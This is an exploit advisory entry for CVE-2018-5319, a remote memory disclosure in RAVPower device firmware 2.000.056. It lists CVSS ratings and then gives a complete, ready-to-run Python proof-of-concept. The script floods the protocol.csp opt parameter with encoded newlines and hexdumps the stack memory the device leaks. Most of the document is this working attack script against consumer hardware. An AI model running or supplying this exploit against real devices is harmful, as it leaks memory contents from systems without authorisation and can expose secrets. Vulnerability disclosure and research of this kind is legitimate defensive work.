RAVPower 2.000.056 Memory Disclosure

Risk: Medium
Local: Yes
Remote: No
CWE: CWE-200

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

""" # Exploit Title: RAVPower - remote stack disclosure # Date: 22/01/2018 # Exploit Author: Daniele Linguaglossa # Vendor Homepage: https://www.ravpower.com/ # Software Link: https://www.ravpower.com/ # Version: 2.000.056 # Tested on: OSX # CVE : CVE-2018-5319 """ import socket import sys import re __author__ = "Daniele Linguaglossa" def redall(s): tmp = s.recv(1) while not str(tmp).endswith("<errno>"): tmp+=s.recv(1) print tmp tmp = str(tmp).split("\r\n\r\n",1)[1] return re.sub("[\x0a]+","", tmp,100) def hexdump(src, length=16): FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) lines = [] for c in xrange(0, len(src), length): chars = src[c:c+length] hex = ' '.join(["%02x" % ord(x) for x in chars]) printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars]) lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable)) return ''.join(lines) if __name__ == "__main__": if len(sys.argv) == 2: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],80)) packet = "GET /protocol.csp?fname=a&opt=%s&function=get HTTP/1.1\r\nConnection: close\r\nHost: {0}\r\n\r\n".format(sys.argv[1]) packet = packet % ("%0a"*12241) s.send(packet) result = redall(s) print "Dumping memory...\n\n" print hexdump(result) else: print "Usage: {0} <ip>".format(sys.argv[0])

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